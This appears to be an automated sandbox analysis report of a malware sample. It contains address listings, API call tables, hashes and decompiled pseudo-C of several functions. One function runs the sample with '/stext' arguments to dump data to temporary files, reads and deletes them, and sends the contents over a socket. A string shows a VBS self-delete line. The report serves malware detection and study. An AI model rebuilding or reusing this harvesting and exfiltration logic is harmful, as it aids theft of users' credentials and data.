0x004125d5
0x00000000
0x004125d5
0x00412590
0x00412592
0x0041259c
0x004125ac
0x0041259e
0x0041259f
0x0041259f
0x0041259c
0x00000000
0x00000000
0x004125e1
0x004125e3
0x004125d7
0x004125d7
0x00000000
0x00000000
0x00412f50
0x00412f54
0x00412f59
0x00412f5c
0x00412f5e
0x00412f60
0x00412f65
0x00412f67
0x00412f6c
0x00412f71
0x00000000
0x00000000
0x00000000
0x00000000
0x004125f1
0x004125f8
0x004125fd
0x00412600
0x00412604
0x00412606
0x00412611
0x00412613
0x0041261d
0x0041261f
0x00412621
0x00412627
0x004133a8
0x004133a8
0x004133ad
0x004133b2
0x004133b6
0x004133bb
0x004133bf
0x00000000
0x00000000
0x00412630
0x00412639
0x0041263b
0x00412647
0x00412649
0x00000000
0x00000000
0x004126d1
0x004126d1
0x00000000
0x00000000
0x00412655
0x0041265e
0x00412660
0x0041266d
0x00000000
0x00000000
0x00412678
0x00000000
0x00000000
0x0041269f
0x0041267a
0x0041267a
0x0041267c
0x0041267c
0x00412685
0x00412687
0x00412694
0x00000000
0x00000000
0x004126a3
0x004126aa
0x004126b3
0x004126b5
0x004126c2
0x004126c8
0x004126cc
0x00000000
0x00000000
0x004126db
0x004126dd
0x004126e9
0x004126eb
0x004126f1
0x004126f5
0x004126fb
0x00412700
0x0041270a
0x0041271d
0x00412723
0x00412727
0x0041272c
0x00000000
0x00000000
0x00412737
0x0041273b
0x00412741
0x00412746
0x0041274b
0x00412751
0x00412759
0x0041275d
0x00412762
0x00412765
0x0041276d
0x00000000
0x0041276d
0x00000000
0x00000000
0x00412779
0x0041277b
0x00412787
0x00412795
0x00000000
0x00000000
0x004127a2
0x004127a6
0x004127ac
0x004127b1
0x004127b8
0x004127c1
0x004127c3
0x004127cf
0x004127d1
0x004127d9
0x004127e2
0x004127e4
0x004127ea
0x004127f0
0x004127f2
0x004127f8
0x004127f8
0x004127f8
0x00412800
0x00412808
0x0041280e
0x00412810
0x00412812
0x00000000
0x00000000
0x0041281d
0x0041281e
0x00412823
0x00412825
0x00412826
0x00412828
0x00412828
0x00000000
0x00000000
0x0041282b
0x0041282f
0x00412834
0x00412837
0x0041283a
0x0041283f
0x00412844
0x00000000
0x00000000
0x0041284e
0x00412853
0x00000000
0x00000000
0x0041285d
0x00412862
0x00000000
0x00000000
0x0041286e
0x00412872
0x00412878
0x0041287d
0x00412882
0x00000000
0x00000000
0x00412891
0x00412891
0x00412892
0x00412897
0x0041289d
0x004128a2
0x004128a5
0x004128a8
0x004128ad
0x004128b2
0x00000000
0x00000000
0x004128c2
0x004128c7
0x004128c9
0x004128ce
0x00412887
0x00412887
0x00000000
0x00000000
0x00412f9a
0x00412fa0
0x00412fa6
0x00412fa8
0x00412faa
0x00412faa
0x00000000
0x00000000
0x004128d2
0x004128d4
0x004128d9
0x004128df
0x004128e4
0x004128e9
0x004128ee
0x004128f3
0x004128f6
0x004128fb
0x004128fd
0x004128fe
0x004128ff
0x00412900
0x00412901
0x00412906
0x00412908
0x0041290d
0x00412910
0x00412912
0x00412917
0x0041291d
0x00412928
0x0041291f
0x0041291f
0x00412924
0x0041292f
0x00412931
0x0041293c
0x0041293e
0x00000000
0x00000000
0x00412948
0x0041294e
0x00412953
0x00000000
0x00000000
0x0041295d
0x0041295f
0x00412965
0x0041296b
0x00412970
0x00412973
0x00412976
0x0041297d
0x00412986
0x00412988
0x00412994
0x00412997
0x004129a0
0x004129a2
0x004129a8
0x004129af
0x004129b3
0x004129ba
0x004129bc
0x004129c2
0x004129c8
0x004129ca
0x004129cc
0x00000000
0x00000000
0x004129d9
0x004129da
0x004129df
0x004129f2
0x00000000
0x00000000
0x004129fd
0x004129fd
0x004129fe
0x00412a03
0x00412a09
0x00412a0e
0x00412a11
0x00412a14
0x00412a1b
0x00412a1f
0x00412a24
0x00412a27
0x00412a2a
0x00412a2f
0x00412a34
0x004128b7
0x004128b7
0x00000000
0x00000000
0x00412a3e
0x00412a47
0x00412a4f
0x00000000
0x00000000
0x00412a5a
0x00412a61
0x00000000
0x00412a6f
0x00412a6f
0x00412a75
0x00000000
0x00000000
0x00412a69
0x00412a69
0x00412a7b
0x00412a7b
0x004133f0
0x004133f5
0x004133f6
0x004133f8
0x004133fa
0x004133ff
0x00413400
0x00413402
0x00413405
0x00413407
0x00413408
0x0041340a
0x0041340f
0x00413410
0x00413412
0x00413414
0x00413417
0x00413418
0x0041341b
0x0041341c
0x00413422
0x00413424
0x00413426
0x00413428
0x0041342e
0x0041342f
0x00413430
0x00413436
0x00413439
0x0041343b
0x0041343c
0x0041343f
0x00413440
0x00413443
0x00413444
0x00413448
0x0041344e
0x00413451
0x00413458
0x0041345a
0x0041345d
0x0041345f
0x00413460
0x00413463
0x00413464
0x00413467
0x00413468
0x0041346a
0x0041346d
0x0041346e
0x00413471
0x00413473
0x00413474
0x00413477
0x00413478
0x0041347b
0x0041347c
0x00413480
0x00413486
0x00413489
0x0041348b
0x0041348c
0x0041348e
0x00413491
0x00413497
0x00413498
0x0041349b
0x0041349c
0x0041349e
0x004134a3
0x004134a4
0x004134a7
0x004134a8
0x004134ab
0x004134ac
0x004134b2
0x004134b4
0x004134b6
0x004134b8
0x004134ba
0x004134bb
0x004134bc
0x004134be
0x004134be
0x004134c1
0x004134c3
0x004134c4
0x004134c6
0x004134c9
0x004134cb
0x004134cc
0x004134ce
0x004134d1
0x004134d3
0x004134d4
0x004134da
0x004134dd
0x004134de
0x004134e1
0x004134e3
0x004134e4
0x004134e7
0x004134e8
0x004134eb
0x004134ec
0x004134ef
0x004134f0
0x004134f0
0x004134f0
0x004134f2
0x004134f5
0x004134f8
0x004134fb
0x004134fc
0x004134fe
0x00413501
0x00413503
0x00413504
0x00413506
0x00413509
0x00413509
0x00413509
0x0041350a
0x0041350d
0x0041350f
0x00413510
0x00413510
0x00413512
0x00413514
0x00413516
0x00413518
0x0041351a
0x0041351b
0x0041351c
0x0041351e
0x00413520
0x00413522
0x00413524
0x00413526
0x00413528
0x0041352a
0x0041352c
0x00413531
0x00413533
0x00413534
0x00413535
0x00413539
0x00413541
0x00413543
0x00413544
0x00000000
0x00000000
0x00412a7c
0x00000000
0x00000000
0x00412a8e
0x00412a8e
0x00412a94
0x00000000
0x00000000
0x00412a88
0x00412a88
0x00412a96
0x00412a98
0x00412aa2
0x00412aa4
0x00412aab
0x00412aaf
0x00412ab6
0x00412ab8
0x00412abd
0x00412abf
0x00412ac4
0x00412aca
0x00412acb
0x00412acc
0x00412ad5
0x00412ad8
0x00412ae1
0x00412ae3
0x00412ae8
0x00412ae9
0x00412aea
0x00412af0
0x00412af2
0x00000000
0x00000000
0x00000000
0x00000000
0x00412b1c
0x00412b1c
0x00412b22
0x00000000
0x00000000
0x00412b16
0x00412b16
0x00412b26
0x00412b2f
0x00412b31
0x00412b38
0x00412b3c
0x00412b43
0x00412b45
0x00412b4a
0x00412b4c
0x00412b51
0x00412b57
0x00412b5b
0x00412b62
0x00412b66
0x00412b68
0x00412b6d
0x00412b70
0x00412b73
0x00412b78
0x00412b7a
0x00412b7f
0x00412b82
0x00412b84
0x00412af8
0x00412af8
0x00412afb
0x00412aff
0x00412b07
0x00412b0c
0x00412b0c
0x00000000
0x00000000
0x00412b91
0x00412b9a
0x00412b9c
0x00412ba8
0x00412bad
0x00412bb9
0x00412bbb
0x00412bc1
0x00412bc3
0x00412bcd
0x00412bd6
0x00000000
0x00000000
0x00412be1
0x00412be6
0x00412be8
0x00412bed
0x00412bf2
0x00412bf7
0x00412bf9
0x00412bfe
0x00412c02
0x00412c03
0x00412c05
0x00412c1d
0x00412c22
0x00412c27
0x00412c29
0x00412c2e
0x00412c32
0x00412c33
0x00412c35
0x00412c50
0x00412c55
0x00412c5a
0x00412c5c
0x00412c61
0x00412c63
0x00412c98
0x00412c9f
0x00412ca6
0x00412caa
0x00412cac
0x00412cb1
0x00412cb6
0x00412cb8
0x00412cbd
0x00412cbe
0x00412cc0
0x00412cc6
0x00412cca
0x00412ccf
0x00412cd4
0x00412cd6
0x00412cdb
0x00412cdd
0x00412ce3
0x00412ce4
0x00412ce5
0x00000000
0x00412ce5
0x00412cc2
0x00412cc2
0x00412cc3
0x00412ce7
0x00412ce7
0x00412ce7
0x00412c65
0x00412c65
0x00412c68
0x00412c71
0x00412c73
0x00412c79
0x00412c7e
0x00412c7e
0x00000000
0x00412c7e
0x00412c37
0x00412c3e
0x00412c40
0x00412c46
0x00412c4b
0x00000000
0x00412c4b
0x00412c07
0x00412c0e
0x00412c10
0x00412c16
0x00412c81
0x00412c81
0x00412c83
0x00412c83
0x00000000
0x00000000
0x00412d88
0x00412d89
0x00412d8f
0x00412d91
0x00412d9f
0x00412da9
0x00412db1
0x00412db7
0x00412dbe
0x00412dc2
0x00412dc6
0x00412dcb
0x00412dce
0x00412dd2
0x00412dd4
0x00412dd9
0x00412ddb
0x00412de0
0x00413189
0x00413189
0x0041318d
0x0041318d
0x0041318d
0x00000000
0x00000000
0x00412cf5
0x00412cf7
0x00412cfd
0x00412d04
0x00412d0d
0x00412d0f
0x00412d14
0x00412d23
0x00412d26
0x00412d2d
0x00412d31
0x00412d38
0x00412d3a
0x00412d41
0x00412d4a
0x00412d65
0x00000000
0x00412d65
0x00000000
0x00000000
0x00412d6e
0x00412d74
0x00412d76
0x00412d7c
0x00412d82
0x00412d82
0x00000000
0x00412d82
0x00000000
0x00000000
0x00412dea
0x00412dec
0x00412df6
0x00412df8
0x00412dfe
0x00412e02
0x00412e09
0x00412e0b
0x00412e10
0x00412e12
0x00412e14
0x00000000
0x00000000
0x00412e1e
0x00412e22
0x00412e26
0x00412e2a
0x00412e2e
0x00412e37
0x00412e39
0x00412e3e
0x00412e42
0x00412e44
0x00412e4a
0x00412e4d
0x00412e53
0x00412e57
0x00412e64
0x00412817
0x00412817
0x00412817
0x00000000
0x00000000
0x00412e6e
0x00000000
0x00000000
0x00412e7a
0x00412e7e
0x00412e83
0x00412e86
0x00412e8e
0x00000000
0x00000000
0x00412e9a
0x00412e9e
0x00412ea3
0x00412ea6
0x00412eae
0x00000000
0x00000000
0x00412eba
0x00412ebe
0x00412ec3
0x00412ec6
0x00412ece
0x00000000
0x00000000
0x00412ed8
0x00412ed9
0x00412ede
0x00412ee0
0x00412ee6
0x00412ee8
0x00412eee
0x00412ef0
0x00412efa
0x00412f01
0x00412f02
0x00412f0d
0x00412f0f
0x00412f1a
0x00412f24
0x00412f26
0x00000000
0x00000000
0x00412f32
0x00412f36
0x00412f3b
0x00412f3e
0x00412f46
0x00000000
0x00000000
0x00412f7c
0x00412f80
0x00412f85
0x00412f88
0x00412f90
0x004130e5
0x00000000
0x00000000
0x00412454
0x0041244c
0x00412442
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 004123DB
GetTickCount.KERNEL32 ref: 0041245B

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CountEventTick
String ID: 8E@
API String ID: 180926312-787191786
Opcode ID: 65e043957820a90d4195c6ae94db1a57242de9ddaeba944f8e05ce018c461939
Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
Opcode Fuzzy Hash: 65e043957820a90d4195c6ae94db1a57242de9ddaeba944f8e05ce018c461939
Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F

Uniqueness

Uniqueness Score: -1.00%

Function 00410305, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00410305(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
				char _v5;
				char _v6;
				char _v7;
				char _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				char _v252;
				char _v276;
				char _v300;
				char _v324;
				char _v348;
				char _v372;
				char _v396;
				char _v420;
				char _v444;
				char _v468;
				short _v988;
				void* __ebx;
				void* __edi;
				void* _t137;
				void* _t149;
				char _t161;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t199;
				void* _t225;
				void* _t226;
				void* _t394;
				void* _t399;
				void* _t402;
				void* _t405;

				_t405 = __eflags;
				_v12 = 0;
				GetModuleFileNameW(0,  &_v988, 0x104);
				_v5 = 0;
				_v6 = 0;
				E004020D5(0,  &_v300);
				E004020D5(0,  &_v276);
				E004020D5(0,  &_v252);
				E0041800F( &_v228, 0x30, L00401F95(E00417093( &_v36))); // executed
				E00401FC7();
				E0041800F( &_v204, 0x30, L00401F95(E00417093( &_v36))); // executed
				E00401FC7();
				E0041800F( &_v180, 0x30, L00401F95(E00417093( &_v36))); // executed
				E00401FC7();
				L00401F95( &_a52);
				_t393 = L" /stext \"";
				_t137 = E0041432B(L00401EEB(E004030A6(0,  &_v396, E00404429(0,  &_v420, E00404405(0,  &_v444,  &_v988, _t405, E0040427F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\""))); // executed
				_t224 = _t137;
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401F95( &_a76);
				_t149 = E0041432B(L00401EEB(E004030A6(_t224,  &_v324, E00404429(_t137,  &_v348, E00404405(_t137,  &_v372,  &_v988, _t405, E0040427F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\""))); // executed
				_t225 = _t149;
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401F95( &_a100);
				_t161 = E0041432B(L00401EEB(E004030A6(_t225,  &_v84, E00404429(_t225,  &_v108, E00404405(_t225,  &_v132,  &_v988, _t405, E0040427F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\""))); // executed
				_v7 = _t161;
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t399 =  ==  ? 1 : 0;
				if(_t225 == 0) {
					_t399 = _t399 + 1;
				}
				if(_v7 == 0) {
					_t399 = _t399 + 1;
				}
				_t226 = DeleteFileW;
				_t394 = 0;
				while(1) {
					_t168 = E004179DC(L00401EEB( &_v228),  &_v300); // executed
					if(_t168 != 0) {
						_v12 = 1;
						DeleteFileW(L00401EEB( &_v228));
					}
					_t170 = E004179DC(L00401EEB( &_v204),  &_v276); // executed
					if(_t170 != 0) {
						_v5 = 1;
						DeleteFileW(L00401EEB( &_v204)); // executed
					}
					_t172 = E004179DC(L00401EEB( &_v180),  &_v252); // executed
					if(_t172 != 0) {
						_v6 = 1;
						DeleteFileW(L00401EEB( &_v180)); // executed
					}
					if(_v12 != 0 && _v5 != 0 && _v6 != 0) {
						break;
					}
					Sleep(0x1f4); // executed
					_t394 = _t394 + 1;
					if(_t394 < 0xa) {
						continue;
					}
					break;
				}
				_t173 = E00405A6F("0");
				_t418 = _t173;
				if(_t173 == 0) {
					L00402F93(_t226, _t402 - 0x18, L00402F93(_t226,  &_v156, L00402F93(_t226,  &_v132, L00402F93(_t226,  &_v108, L00402F93(_t226,  &_v84, L00402FB7( &_v60,  &_a28, 0x46c238), __eflags,  &_v300), __eflags, 0x46c238), __eflags,  &_v276), __eflags, 0x46c238), __eflags,  &_v252);
					_push(0x6a);
					E00404AA4(_t226, 0x46c650, _t180, __eflags); // executed
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
				} else {
					_t199 = E00417226(_t226,  &_v324, _t399);
					L00402F1D(_t402 - 0x18, L00402F93(_t226,  &_v156, L00402F93(_t226,  &_v132, L00402F93(_t226,  &_v108, L00402F93(_t226,  &_v84, L00402F93(_t226,  &_v60, L00402F93(_t226,  &_v372, L00402FB7( &_v348,  &_a28, 0x46c238), _t418,  &_v300), _t418, 0x46c238), _t418,  &_v276), _t418, 0x46c238), _t418,  &_v252), _t418, 0x46c238), _t199);
					_push(0x69);
					E00404AA4(_t226, 0x46c650, _t207, _t418);
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
				}
				E00401FC7();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				return E00401FC7();
			}

0x00410305
0x00410320
0x00410323
0x0041032f
0x00410332
0x00410335
0x00410340
0x0041034b
0x00410368
0x00410371
0x0041038e
0x00410397
0x004103b4
0x004103bd
0x004103c5
0x004103dd
0x00410423
0x00410428
0x00410430
0x0041043b
0x00410446
0x00410451
0x00410459
0x004104af
0x004104ba
0x004104bc
0x004104c7
0x004104d2
0x004104da
0x004104e2
0x00410532
0x0041053a
0x0041053d
0x00410545
0x0041054d
0x00410558
0x00410566
0x0041056b
0x0041056d
0x0041056d
0x00410571
0x00410573
0x00410573
0x00410574
0x0041057a
0x0041057c
0x0041058f
0x00410596
0x0041059e
0x004105a8
0x004105a8
0x004105bd
0x004105c4
0x004105cc
0x004105d6
0x004105d6
0x004105eb
0x004105f2
0x004105fa
0x00410604
0x00410604
0x0041060a
0x00000000
0x00000000
0x0041061d
0x00410623
0x00410627
0x00000000
0x00000000
0x00000000
0x00410627
0x00410635
0x0041063a
0x0041063c
0x0041078d
0x00410793
0x0041079a
0x004107a5
0x004107ad
0x004107b5
0x004107bd
0x00410642
0x0041064a
0x004106ce
0x004106d4
0x004106db
0x004106e6
0x004106ee
0x004106f6
0x004106fe
0x00410706
0x00410711
0x0041071c
0x00410721
0x004107c5
0x004107d0
0x004107db
0x004107e6
0x004107f1
0x004107fc
0x00410807
0x0041080f
0x00410817
0x0041081f
0x00410827
0x0041083a

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323

Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,74B5FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA

Part of subcall function 0041432B: CloseHandle.KERNEL32( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A

DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
DeleteFileW.KERNELBASE(00000000,0045F464,0045F464,0045F464), ref: 004105D6
DeleteFileW.KERNELBASE(00000000,0045F464,0045F464,0045F464), ref: 00410604
Sleep.KERNELBASE(000001F4,0045F464,0045F464,0045F464), ref: 0041061D

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

/stext ", xrefs: 004103DD, 004103E3, 0041046F, 004104FB

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
String ID: /stext "
API String ID: 1351907930-3856184850
Opcode ID: 1adbc206513e4397bd93f4418bf1d54351f2b848565a73fa930f9a925a0b31c1
Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
Opcode Fuzzy Hash: 1adbc206513e4397bd93f4418bf1d54351f2b848565a73fa930f9a925a0b31c1
Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48

Uniqueness

Uniqueness Score: -1.00%

Function 00417947, Relevance: 7.6, APIs: 5, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00417947(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				void* _t12;
				int _t14;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t12 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21); // executed
				_t30 = _t12;
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						_t14 = WriteFile(_t30, _v8, _t27,  &_v12, _t21); // executed
						if(_t14 != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}

0x0041794a
0x0041794b
0x00417951
0x00417953
0x00417957
0x00417959
0x0041795b
0x00417973
0x00417978
0x0041795d
0x00417960
0x00417969
0x0041796c
0x00417962
0x00417964
0x00417965
0x00417965
0x00417960
0x00417986
0x0041798c
0x00417991
0x0041799b
0x004179c0
0x004179c8
0x004179ca
0x004179ca
0x004179cd
0x004179d3
0x00000000
0x004179ad
0x004179ae
0x00000000
0x004179ae
0x00417993
0x00417993
0x00417993
0x004179d5
0x004179db
0x004179db

APIs

CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179AE
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179C0
CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179CD

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction ID: 60abe95f3f53f8d2d0590be13cf87a5088bcec8eb26bc593558798ef6058d585
Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction Fuzzy Hash: 8F11E0B1214118BFFB104F649C89EFB777CEB063B2F104266F915D6280C6749E888A68

Uniqueness

Uniqueness Score: -1.00%

Function 00404CAB, Relevance: 6.1, APIs: 4, Instructions: 128
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404CAB(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __esi;
				void* _t41;
				signed int _t46;
				void* _t49;
				void* _t53;
				void* _t70;
				void* _t73;
				void* _t74;
				struct _SECURITY_ATTRIBUTES* _t77;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t106;
				void* _t107;

				_t101 = __edx;
				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_v20 = __ecx;
				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
				E004020D5(_t74,  &_v44);
				_t103 = _a4;
				_t8 = _t105 + 0x4c; // 0x46c334
				_t41 = _t8;
				while(L00404E51(_t105, L00401F95(_t103),  &_v12, _t41) != 0) {
					_t10 = _t105 + 0x40; // 0x8
					_t46 =  *_t10 & 0x000000ff;
					_v16 = _t46;
					if(_v12 + _t46 <= E00402489()) {
						_t77 = 0;
						__eflags = 0;
					} else {
						_t77 = 1;
						_t73 = E00402489();
						_t105 = _v20;
						_t103 = _a4;
						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
					}
					if(_t77 == 0) {
						_t78 = _v16;
						_t49 = E004042A6(_t103,  &_v68, _v16, 0xffffffff); // executed
						E00401FD1( &_v44, _t101, _t105, _t49);
						E00401FC7();
						_t53 = E004042A6( &_v44,  &_v68, 0, _v12); // executed
						E00401FD1( &_v44, _t101, _t105, _t53);
						E00401FC7();
						_t112 = _a12;
						if(_a12 != 0) {
							_t30 = _t105 + 0x1c; // 0x46c304
							L00401FAD(_t30,  &_v44);
							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a8, _t105, 0, 0); // executed
							_t33 = _t105 + 0x34; // 0x0
							WaitForSingleObject( *_t33, 0xffffffff);
							_t34 = _t105 + 0x34; // 0x0, executed
							FindCloseChangeNotification( *_t34); // executed
						} else {
							_t107 = _t106 - 0x18;
							E004020EC(_t78, _t107, _t101, _t112,  &_v44);
							_a8(_t105);
							_t106 = _t107 + 0x1c;
						}
						E00401FD1(_t103, _t101, _t105, E004042A6(_t103,  &_v68, _v12 + _t78, 0xffffffff)); // executed
						E00401FC7();
						_t70 = E00402489();
						_t38 = _t105 + 0x4c; // 0x46c334
						_t41 = _t38;
						if(_t70 != 0) {
							continue;
						}
					}
					break;
				}
				return E00401FC7();
			}

0x00404cab
0x00404cb1
0x00404cb7
0x00404cbd
0x00404cc0
0x00404cc4
0x00404cc9
0x00404ccc
0x00404ccc
0x00404ccf
0x00404ceb
0x00404ceb
0x00404cf4
0x00404d00
0x00404d1e
0x00404d1e
0x00404d02
0x00404d04
0x00404d06
0x00404d0e
0x00404d14
0x00404d19
0x00404d19
0x00404d22
0x00404d28
0x00404d34
0x00404d3d
0x00404d45
0x00404d56
0x00404d5f
0x00404d67
0x00404d6c
0x00404d73
0x00404d8a
0x00404d8d
0x00404d9e
0x00404da1
0x00404dab
0x00404db3
0x00404db6
0x00404dbc
0x00404dbf
0x00404d75
0x00404d75
0x00404d7b
0x00404d81
0x00404d84
0x00404d84
0x00404ddb
0x00404de3
0x00404dea
0x00404df1
0x00404df1
0x00404df4
0x00000000
0x00000000
0x00404df4
0x00000000
0x00404d22
0x00404e08

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C334), ref: 00404D98
CreateThread.KERNELBASE ref: 00404DAB
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DB6
FindCloseChangeNotification.KERNELBASE(00000000,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DBF

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
String ID:
API String ID: 2579639479-0
Opcode ID: 9d91b7f64c6e39e5a9e8b04c3701a8bcca088cf2191b23a238279e5d499c65d8
Instruction ID: 953b0e9f26d888488a0b13dcb1c7857754b01e04207d428095d89ba0379a6afb
Opcode Fuzzy Hash: 9d91b7f64c6e39e5a9e8b04c3701a8bcca088cf2191b23a238279e5d499c65d8
Instruction Fuzzy Hash: 034171B1900219AFCB10EBA5CC559FEBBBDAF44314F04016EF952B32D1DB38A9458B64

Uniqueness

Uniqueness Score: -1.00%

Function 004179DC, Relevance: 6.1, APIs: 4, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004179DC(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* _t6;
				int _t11;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t6 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t22 = _t6;
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E00402459(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					_t11 = ReadFile(_t22, L00401F95(_v8), _t25,  &_v12, 0); // executed
					if(_t11 != 0) {
						_t15 = 1;
					}
					FindCloseChangeNotification(_t22); // executed
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}

0x004179df
0x004179e0
0x004179e3
0x004179e5
0x004179f9
0x004179ff
0x00417a04
0x00417a16
0x00417a1a
0x00417a28
0x00417a32
0x00417a3b
0x00417a3d
0x00417a3d
0x00417a40
0x00417a46
0x00417a06
0x00417a06
0x00417a06
0x00417a4d

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
GetFileSize.KERNEL32(00000000,00000000,00000000,?,004136FE), ref: 00417A0D
ReadFile.KERNELBASE(00000000,00000000,00000000,004136FE,00000000,00000000,00000000,?,004136FE), ref: 00417A32
FindCloseChangeNotification.KERNELBASE(00000000,004136FE), ref: 00417A40

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$ChangeCloseCreateFindNotificationReadSize
String ID:
API String ID: 2135649906-0
